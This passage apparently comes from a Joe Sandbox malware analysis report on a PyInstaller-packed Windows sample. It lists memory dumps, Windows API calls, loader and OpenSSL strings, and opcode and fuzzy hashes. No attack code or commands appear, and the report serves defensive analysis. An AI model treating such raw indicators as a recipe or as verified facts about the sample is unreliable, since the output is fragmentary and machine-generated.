                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                          • Opcode ID: d30e7c5704879f11d1e112ae6777e6cf3c1901bb9f2e947874565881c85a4ca2
                                                                                                                                                                                                                                          • Instruction ID: 2637b1a6361a26ab418502f950d37b9bf8a85302ec95de1b65f4366f5f5a4780
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d30e7c5704879f11d1e112ae6777e6cf3c1901bb9f2e947874565881c85a4ca2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64F06D2260DB8196E6009F16F84026AA7A4EB85FC0F188035EE9D87B69DE3CC4518700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF67AEE0D00,?,?,?,00007FF67AEE236A,?,?,?,?,?,00007FF67AEE3B59), ref: 00007FF67AEED6AA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                                          • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                          • Instruction ID: 246bcc63316234fdbbf05648262b30252832f46eca54ec5bf25f60ccc97889d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFF05812F2E34384FEA47771588127813908F94BA0F0C03B0DD2ECA3F2EE6CE480A610
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                          • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                          • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                          • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                          • Instruction ID: 69b5a666fe98631bca6c1411317543d8f2af48f00ae4850d0e564a3bbcc7d722
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14D19133A28A8286EB50AF74E8542AD3764FF84B58F504279DE5D83AB4DF3CD544DB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000006.00000002.3010460517.00007FF8B9101000.00000040.00000001.01000000.00000015.sdmp, Offset: 00007FF8B9100000, based on PE: true
• Associated: 00000006.00000002.3010325096.00007FF8B9100000.00000002.00000001.01000000.00000015.sdmp
• Associated: 00000006.00000002.3010460517.00007FF8B911E000.00000040.00000001.01000000.00000015.sdmp
• Associated: 00000006.00000002.3010460517.00007FF8B9128000.00000040.00000001.01000000.00000015.sdmp
• Associated: 00000006.00000002.3010843875.00007FF8B912B000.00000080.00000001.01000000.00000015.sdmp
• Associated: 00000006.00000002.3010910842.00007FF8B912D000.00000004.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff8b9100000_D1UL0FG.jbxd
Similarity
• API ID: 00007
• String ID: %X:%X:%X:%X:%X:%X:%X:%X$%d.%d.%d.%d$<INVALID>$<invalid>$DNS$DirName$IP Address$Invalid value %.200s$Registered ID$URI$Unknown general name type %d$email$failed to allocate BIO
• API String ID: 3568877910-4109427827
• Opcode ID: 7895d131b6137be5c8c8624093367bb48e18f136146c53bb6ebae29535947f32
• Instruction ID: 6599932094976bea7d56cf1cfe673f91e90b43ba1b0c4dc1302eda07fb707824
• Opcode Fuzzy Hash: 7895d131b6137be5c8c8624093367bb48e18f136146c53bb6ebae29535947f32
• Instruction Fuzzy Hash: 26F15E25A08BC286EA558F2EA85413977A1FF85BD1F4440B5DF4E86AB4EF3EF404E710
APIs
Memory Dump Source
• Source File: 00000006.00000002.3002205748.00007FF8A8631000.00000040.00000001.01000000.0000001A.sdmp, Offset: 00007FF8A8630000, based on PE: true
• Associated: 00000006.00000002.3002160686.00007FF8A8630000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000006.00000002.3002205748.00007FF8A8694000.00000040.00000001.01000000.0000001A.sdmp
• Associated: 00000006.00000002.3002205748.00007FF8A86E3000.00000040.00000001.01000000.0000001A.sdmp
• Associated: 00000006.00000002.3002205748.00007FF8A873C000.00000040.00000001.01000000.0000001A.sdmp
• Associated: 00000006.00000002.3002205748.00007FF8A8741000.00000040.00000001.01000000.0000001A.sdmp
• Associated: 00000006.00000002.3002205748.00007FF8A8744000.00000040.00000001.01000000.0000001A.sdmp
• Associated: 00000006.00000002.3002828639.00007FF8A8745000.00000080.00000001.01000000.0000001A.sdmp
• Associated: 00000006.00000002.3002876682.00007FF8A8747000.00000004.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff8a8630000_D1UL0FG.jbxd
Similarity
• API ID: 00007B919ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 923106377-0
• Opcode ID: bc038827588cf40f583b99cfdd4304ae94c893dbf377535741e30029c5cf38f6
• Instruction ID: aa98b981630f7dbe750c9d9c3438959617f932b1014e5156d211c521be7327ad
• Opcode Fuzzy Hash: bc038827588cf40f583b99cfdd4304ae94c893dbf377535741e30029c5cf38f6
• Instruction Fuzzy Hash: BC316F7260AB8196FB608F60E9843EE7364FB84784F44603ADA4E47B98DF3CD548C724
APIs
• FindFirstFileW.KERNEL32(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED841B
• RemoveDirectoryW.KERNEL32(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED849E
• DeleteFileW.KERNEL32(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED84BD
• FindNextFileW.KERNEL32(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED84CB
• FindClose.KERNEL32(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED84DC
• RemoveDirectoryW.KERNEL32(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED84E5
Strings
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
• Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
• Instruction ID: d3a2438e11d2ca88eb340adb5ca6ecbc3b6e3c88ee57efbd3099f17788b74922
• Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
• Instruction Fuzzy Hash: 9241B233A2CA4285EE60BB20E4541B96760FBD4B95FA002B6D59DC36E4DF3CE54ADB00
APIs
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
• Instruction ID: cf2770487e1234ec44757334ece3c32facafec0d435b1ac96b1089b2e334007d
• Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
• Instruction Fuzzy Hash: 81313373619B8189EBA09F64E8803EE7364FB84744F444439DA4D87BA5EF3CD548DB10
APIs
• _get_daylight.LIBCMT ref: 00007FF67AEF5CB5
  • Part of subcall function 00007FF67AEF5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEF561C
  • Part of subcall function 00007FF67AEEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9CE
  • Part of subcall function 00007FF67AEEA9B8: GetLastError.KERNEL32(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9D8
  • Part of subcall function 00007FF67AEEA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF67AEEA94F,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEA979
  • Part of subcall function 00007FF67AEEA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF67AEEA94F,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEA99E
• _get_daylight.LIBCMT ref: 00007FF67AEF5CA4
  • Part of subcall function 00007FF67AEF5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEF567C
• _get_daylight.LIBCMT ref: 00007FF67AEF5F1A
• _get_daylight.LIBCMT ref: 00007FF67AEF5F2B
• _get_daylight.LIBCMT ref: 00007FF67AEF5F3C
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF67AEF617C), ref: 00007FF67AEF5F63
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID:
• API String ID: 4070488512-0
• Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
• Instruction ID: 2ea0de5c1396435eefc315366a3c5b596948944cbb0b1f8305bf955c7f59c302
• Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
• Instruction Fuzzy Hash: 45D12363A2828286E7A4FF21E8501B92751FF94784F41817EEE0DC76A6EF3CE541DB50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C61208
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\ssl\packet_local.h
                                                                                                                                                                                                                                          • API String ID: 3535234312-2178723975
                                                                                                                                                                                                                                          • Opcode ID: c0126a933966b586eb01444f1caf48306036ef3bd94800007dc601cda98a503f
                                                                                                                                                                                                                                          • Instruction ID: 2e7676422687676dfa7490dc353ab5bff81014f4ed3c363881a91af0b0a902eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0126a933966b586eb01444f1caf48306036ef3bd94800007dc601cda98a503f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA12B172A0EAD1A5E7608F29E4487BE6BA1FB84BC4F046135DE9D87689DF7CD540CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Cannot create a client socket with a PROTOCOL_TLS_SERVER context, xrefs: 00007FF8B910B4C1
                                                                                                                                                                                                                                          • Cannot create a server socket with a PROTOCOL_TLS_CLIENT context, xrefs: 00007FF8B910B47A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3010460517.00007FF8B9101000.00000040.00000001.01000000.00000015.sdmp, Offset: 00007FF8B9100000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010325096.00007FF8B9100000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010460517.00007FF8B911E000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010460517.00007FF8B9128000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010843875.00007FF8B912B000.00000080.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010910842.00007FF8B912D000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8b9100000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007
                                                                                                                                                                                                                                          • String ID: Cannot create a client socket with a PROTOCOL_TLS_SERVER context$Cannot create a server socket with a PROTOCOL_TLS_CLIENT context
                                                                                                                                                                                                                                          • API String ID: 3568877910-1683031804
                                                                                                                                                                                                                                          • Opcode ID: b95670345501fec5c41356c3bb9ea749bfbd1fc0679f4d4f1cae1cc119d6eaae
                                                                                                                                                                                                                                          • Instruction ID: cce2403c55ed7aa83e792a4ca4f0675e09ee01a20aee0d02a125461569f88f08
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b95670345501fec5c41356c3bb9ea749bfbd1fc0679f4d4f1cae1cc119d6eaae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70913E75A08B8282EA649F2AE85413963A2FF88BD4F444175CB4E477B4CF3EE445E710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF67AED45E4,00000000,00007FF67AED1985), ref: 00007FF67AED9439
                                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,00007FF67AED88A7,?,?,00000000,00007FF67AED3CBB), ref: 00007FF67AED821C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED2810: MessageBoxW.USER32 ref: 00007FF67AED28EA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                          • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                          • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                          • Opcode ID: 6fbdb188916104b0c2c5940302cfd80688c9116ecc918f500a0c860990a20752
                                                                                                                                                                                                                                          • Instruction ID: d0e97c873fbb4cc8c1bab014d2b7e853b1dfa67cc1ac6b105376c7bf38949823
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fbdb188916104b0c2c5940302cfd80688c9116ecc918f500a0c860990a20752
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C451D723A3D68285FB50BB24E8516BA6360EFD4784F544075E50EC66F5EE2CE505F740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                          • String ID: P%
                                                                                                                                                                                                                                          • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                          • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction ID: a011452b26be41af9b5d829c9c31bdf55d01aef9534cbb0a8b0f9f6a792587c8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5751C637614BA186D6249F26F4181BAB7A1F798B61F004125EBDE83694EF3CD085DB10
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3002205748.00007FF8A8631000.00000040.00000001.01000000.0000001A.sdmp, Offset: 00007FF8A8630000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002160686.00007FF8A8630000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A8694000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A86E3000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A873C000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A8741000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A8744000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002828639.00007FF8A8745000.00000080.00000001.01000000.0000001A.sdmpDownload File
• Associated: 00000006.00000002.3002876682.00007FF8A8747000.00000004.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff8a8630000_D1UL0FG.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
• String ID:
• API String ID: 349153199-0
• Opcode ID: 1738fc931c46e0016abe01128f6c04fa9ae34eb026bf82ed76cd7c7c3c76c679
• Instruction ID: b0d0faf367a404e344fffb3a77c0af06a984e134fcef86d2c03a5b1988caee03
• Opcode Fuzzy Hash: 1738fc931c46e0016abe01128f6c04fa9ae34eb026bf82ed76cd7c7c3c76c679
• Instruction Fuzzy Hash: 3581D561E0F243B6FA509B66A8492792291FF457C2F14B039DA6C57396DF3CE8458338
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: -$:$f$p$p
• API String ID: 3215553584-2013873522
• Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction ID: dd4dde16f49b3cd1f81474439cfa99d0b263006a46247afb9f0efd89d0bf18e9
• Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction Fuzzy Hash: 3312B373F2C14386FB207B14E1542B97792FB40750F844575E68A876E8DF3DE990AB02
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF67AED3706,?,00007FF67AED3804), ref: 00007FF67AED2C9E
• FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF67AED3706,?,00007FF67AED3804), ref: 00007FF67AED2D63
• MessageBoxW.USER32 ref: 00007FF67AED2D99
Strings
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Message$CurrentFormatProcess
• String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
• API String ID: 3940978338-251083826
• Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
• Instruction ID: b6a4aff4207acfc08c7b17e42b1ccb9ea619be30a6cd658304911a804c79d122
• Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
• Instruction Fuzzy Hash: 9E31D233B18B4146E620BB25B8102AB66A5BFC8BC8F510136EF8DD3769EE3CD546D700
APIs
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
